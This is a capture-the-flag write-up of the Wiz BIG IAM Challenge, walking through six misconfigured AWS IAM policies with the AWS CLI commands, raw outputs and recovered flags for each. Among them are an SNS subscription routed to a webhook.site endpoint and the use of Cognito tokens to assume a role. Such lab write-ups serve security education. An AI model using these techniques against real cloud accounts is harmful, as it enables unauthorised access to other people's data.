> ## Documentation Index
> Fetch the complete documentation index at: https://paulkadali.com/llms.txt
> Use this file to discover all available pages before exploring further.

# The BIG IAM Challenge writeup

> https://bigiamchallenge.com/

## Challenge 1 - Buckets of Fun

> We all know that public buckets are risky. But can you find the flag?

```json IAM Policy theme={null}
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                }
            }
        }
    ]
}
```

From the IAM policy we can see that anyone can download or List an object from the bucket `thebigiamchallenge-storage-9979f4b`

You can use the terminal provided in the same page itself to execute and test out the commands

```bash theme={null}
aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
2023-06-05 19:13:53         37 flag1.txt
2023-06-08 19:18:24      81889 logo.png

aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -
{wiz:exposed-storage-risky-as-usual}
```

## Challenge 2 - ~~Google~~ Analytics

> We created our own analytics system specifically for this challenge. We think it's so good that we even used it on this page. What could go wrong?
>
> Join our queue and get the secret flag.

```json IAM Policy theme={null}
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "sqs:SendMessage",
                "sqs:ReceiveMessage"
            ],
            "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
        }
    ]
}
```

From the IAM policy we'll be able to send and receive SQS messages from `wiz-tbic-analytics-sqs-queue-ca7a1b2` .

A queue URL in terms of AWS refers to a unique URL that is used to access a queue within the Amazon Simple Queue Service . Lets see if receive any message by forming a queue URL

```bash theme={null}
aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2
{
    "Messages": [
        {
            "MessageId": "c451d297-986c-4648-822a-60956ddcc497",
            "ReceiptHandle": "AQEBrO6F0xkzafMfOJX7VlnLRAOyt87sjvPfIDKcuzn/FOMFZnyx2A9mo6P9HQuSZbxHymiwFhwFj28MqJRMprjYwhilVWlfQP1DlMFm0BIPmrMdAwmwZq/fW5UVfIx/BCUVt4uwkfdsuKb
Hg/tNDUzdhsjS579K3/Vu5pxc5CbU0wAftpf+YB7i0kwriSiZI8/4fx9CWvlQ9tlsyAje7b5SERhT9a815oVnrTp7dCiX/1rdh3zRJLds+1eFjHngWeSq8lAOZ1PaakES14wYwEZ0DQObL6Ga8iMCvX0K0D84twgBmYlWKfod84tJ
KN0822zBdM6PaCHekoe2yl8bCQfCgTzRsPKgFMJ3bgvh+0gscvq1Ddmur6td/3IXEymjSmtFHLBuEoE999qSDVgC8eObDEBcABnVP2uqY+FX7kxaQWI=",
            "MD5OfBody": "4cb94e2bb71dbd5de6372f7eaea5c3fd",
            "Body": "{\"URL\": \"https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html\", \"User-Agent\": \"Lynx/2.5329.3258dev.35046 libwww-FM/2.14 SSL
-MM/1.4.3714\", \"IsAdmin\": true}"
        }
    ]
}
```

In the received message we can see a URL, we can check it out by simply using curl

```bash theme={null}
curl https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html
{wiz:you-are-at-the-front-of-the-queue}
```

## Challenge 3 - Enable Push Notifications

> We got a message for you. Can you get it?

```json IAM Policy theme={null}
{
    "Version": "2008-10-17",
    "Id": "Statement1",
    "Statement": [
        {
            "Sid": "Statement1",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "SNS:Subscribe",
            "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
            "Condition": {
                "StringLike": {
                    "sns:Endpoint": "*@tbic.wiz.io"
                }
            }
        }
    ]
}
```

From the policy we can see that anyone is allowed to subscribe to notifications from `TBICWizPushNotifications` on one condition which is the endpoint should end with `@tbic.wiz.io`

As we do not have an email ending in that domain we can use another protocol like HTTPS to subscribe to it using webhooks. ([https://webhook.site](https://webhook.site))

```bash theme={null}
aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol https --notification-endpoint https://webhook.site/{your-assigend-id}/@tbic.wiz.io
```

In the webhook dashboard you can see a POST notification for Subscription confirmation, To confirm the subscription to the notifications visit the URL from SubscribeURL in the confirmation message. You'll receive the flag as the message once you confirm

## Challenge 4 - Admin only?

> We learned from our mistakes from the past. Now our bucket only allows access to one specific admin user. Or does it?

```json IAM Policy theme={null}
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                },
                "ForAllValues:StringLike": {
                    "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
                }
            }
        }
    ]
}
```

The policy allows anyone to download objects from the bucket `thebigiamchallenge-admin-storage-abf1321` and anyone can list the objects on the condition that the prefix should be `files/*` and the user arn is `arn:aws:iam::133713371337:user/admin`

```bash theme={null}
curl "https://s3.amazonaws.com/thebigiamchallenge-admin-storage-abf1321?prefix=files/"
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Name>thebigiamchallenge-admin-storage-abf1321</Name><Prefix>files/</Prefix><Marker></Marker><MaxKeys>1000<
/MaxKeys><IsTruncated>false</IsTruncated>
<Contents>
    <Key>files/flag-as-admin.txt</Key>
    <LastModified>2023-06-07T19:15:43.000Z</LastModified>
    <ETag>"e365cfa7365164c05d7a9c209c4d8514"</ETag>
    <Size>42</Size>
    <StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
    <Key>files/logo-admin.png</Key>
    <LastModified>2023-06-08T19:20:01.000Z</LastModified>
    <ETag>"c57e95e6d6c138818bf38daac6216356"</ETag>
    <Size>81889</Size>
    <StorageClass>STANDARD</StorageClass>
</Contents></ListBucketResult>
```

From the response we can see that there are 2 objects we can get out of which one is the flag

```bash theme={null}
curl "https://s3.amazonaws.com/thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt"
{wiz:principal-arn-is-not-what-you-think}
```

## Challenge 5 - Do I know you?

> We configured AWS Cognito as our main identity provider. Let's hope we didn't make any mistakes.

```bash IAM Policy theme={null}
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "mobileanalytics:PutEvents",
                "cognito-sync:*"
            ],
            "Resource": "*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::wiz-privatefiles",
                "arn:aws:s3:::wiz-privatefiles/*"
            ]
        }
    ]
}
```

We can see that the policy allows all actions within the Cognito Sync Service. Allows to download and list any object from the bucket `wiz-privatefiles`

We know that the Cognito Service is being used but we need to find the identity pool id to make calls to the application. The AWS cognito image you see on the screen is being hosted on the wiz-privatefiles bucket we can see that if we open the image in a new tab. If you check the source code of the challenge page we can find the Cognito Service creds.

<img src="https://mintcdn.com/paulkadali/XmQs3x1tniUPPQeV/images/b1.avif?fit=max&auto=format&n=XmQs3x1tniUPPQeV&q=85&s=5bfe0d2e99585aed87abe20f6256aec1" alt="B1 Avi" width="768" height="268" data-path="images/b1.avif" />

You can open devtools and the check config creds in console

<img src="https://mintcdn.com/paulkadali/XmQs3x1tniUPPQeV/images/b2.png?fit=max&auto=format&n=XmQs3x1tniUPPQeV&q=85&s=256699139d477a6802d1be203e9d473c" alt="B2 Pn" width="678" height="871" data-path="images/b2.png" />

```bash theme={null}
export AWS_ACCESS_KEY_ID= <given key>
export AWS_SECRET_ACCESS_KEY= <given key>
export AWS_SESSION_TOKEN= <given key>

aws s3 ls s3://wiz-privatefiles/
2023-06-06 01:12:27       4220 cognito1.png
2023-06-05 18:58:35         37 flag1.txt

aws s3 cp s3://wiz-privatefiles/flag1.txt -
{wiz:incognito-is-always-suspicious}
```

## Challenge 6 - One final push

> Anonymous access no more. Let's see what can you do now.
>
> Now try it with the authenticated role: *arn:aws:iam::092297851374:role/Cognito\_s3accessAuth\_Role*

```json IAM Policy theme={null}
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "cognito-identity.amazonaws.com"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
                }
            }
        }
    ]
}
```

This IAM policy allows identity `us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b` to assume role.

```bash theme={null}
> aws cognito-identity get-id --region us-east-1 --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
{
    "IdentityId": "us-east-1:157d6171-ee1b-c968-98c2-7c97c13d98d2"
}

> aws cognito-identity get-open-id-token --region us-east-1 --identity-id us-east-1:157d6171-ee1b-c968-98c2-7c97c13d98d2
{
    "IdentityId": "us-east-1:157d6171-ee1b-c968-98c2-7c97c13d98d2",
    "Token": "eyJraWQiOiJ1cy1lYXN0LTEtNyIsInR5cCI6IkpXUyIsImFsZyI6IlJTNTEyIn0.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWUxYi1jOTY4LTk4YzItN2M5N2MxM2Q5OGQyIiwiYXVkIjoidXMtZWFzdC0
xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3NDM2Nzc0NjEs
ImlhdCI6MTc0MzY3Njg2MX0.luizXdcTC1LynFdtYdMBgaRZPFTLLLUPUsQePAuCG6P9IIXMZb7RwYw4RsDhHDwWB9H9T4Ln6gmnDHmyGIzxhuswMoX9DMHT_z8ckkEpxLJv63Bl4AXtiFmvdzBanfIpog9mEC80C-iYnHvUmWuoD
l7pwC6b1wCN4MgYwmxtByTDiUxSUNGxnHycfx8mebQlYuZG549EXGP_Av9vlJsfeakW4uv8XgvGkFXOQ69XxrHuz6NFQjBBfloF9M6WiuA7AJUHDtcNWWL9_jfcrZcIHJP1bZNyIS3J2VRnmD_HJX_C0qxlEhrhh1H80T0RzSvnZn
1sv8sji9EVRAoLJ3aXKw"
}

> aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name iam-challenge-6 --web-identity-token 'eyJraWQiOiJ1cy1lYXN0LTEtNyIsInR5cCI6IkpXUyIsImFsZyI6IlJTNTEyIn0.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWUxYi1jOTY4LTk4YzItN2M5N2MxM2Q5OGQyIiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3NDM2Nzc0NjEsImlhdCI6MTc0MzY3Njg2MX0.luizXdcTC1LynFdtYdMBgaRZPFTLLLUPUsQePAuCG6P9IIXMZb7RwYw4RsDhHDwWB9H9T4Ln6gmnDHmyGIzxhuswMoX9DMHT_z8ckkEpxLJv63Bl4AXtiFmvdzBanfIpog9mEC80C-iYnHvUmWuoDl7pwC6b1wCN4MgYwmxtByTDiUxSUNGxnHycfx8mebQlYuZG549EXGP_Av9vlJsfeakW4uv8XgvGkFXOQ69XxrHuz6NFQjBBfloF9M6WiuA7AJUHDtcNWWL9_jfcrZcIHJP1bZNyIS3J2VRnmD_HJX_C0qxlEhrhh1H80T0RzSvnZn1sv8sji9EVRAoLJ3aXKw'

{
    "Credentials": {
        "AccessKeyId": <given key>,
        "SecretAccessKey": <given key>,
        "SessionToken": <given key>,
        "Expiration": "2025-04-03T11:42:30Z"
    },
    "SubjectFromWebIdentityToken": "us-east-1:157d6171-ee1b-c968-98c2-7c97c13d98d2",
    "AssumedRoleUser": {
        "AssumedRoleId": "AROARK7LBOHXASFTNOIZG:iam-challenge-6",
        "Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/iam-challenge-6"
    },
    "Provider": "cognito-identity.amazonaws.com",
    "Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}

> export AWS_ACCESS_KEY_ID=<given key>
> export AWS_SECRET_ACCESS_KEY=<given key>
> export AWS_SESSION_TOKEN=<given key>


> aws s3 ls
2024-06-06 11:51:35 challenge-website-storage-1fa5073
2024-06-06 13:55:59 payments-system-cd6e4ba
2023-06-04 22:37:29 tbic-wiz-analytics-bucket-b44867f
2023-06-05 18:37:44 thebigiamchallenge-admin-storage-abf1321
2023-06-04 22:01:02 thebigiamchallenge-storage-9979f4b
2023-06-05 18:58:31 wiz-privatefiles
2023-06-05 18:58:31 wiz-privatefiles-x1000

> aws s3 ls wiz-privatefiles-x1000
2023-06-06 01:12:27       4220 cognito2.png
2023-06-05 18:58:35         40 flag2.txt

> aws s3 cp s3://wiz-privatefiles-x1000/flag2.txt -
{wiz:open-sesame-or-shell-i-say-openid}
```

<img src="https://mintcdn.com/paulkadali/XmQs3x1tniUPPQeV/images/cet1.avif?fit=max&auto=format&n=XmQs3x1tniUPPQeV&q=85&s=be657b01253817320ecf46154855082a" alt="Cet1 Avi" width="768" height="545" data-path="images/cet1.avif" />
